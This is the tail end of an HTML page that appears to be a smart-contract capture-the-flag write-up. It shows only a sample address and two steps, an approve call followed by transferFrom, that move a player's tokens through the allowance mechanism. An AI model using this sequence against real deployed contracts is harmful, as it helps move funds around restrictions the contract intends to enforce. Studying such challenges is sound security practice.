addr=&apos;0x5B38Da6a701c568545dCfcB03FcB875f56beddC4&apos;
<ol>
<li>contract.approve(player,val)</li>
<li>contract.transferFrom(player,addr,val)</li>
</ol>
</li>
</ul>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>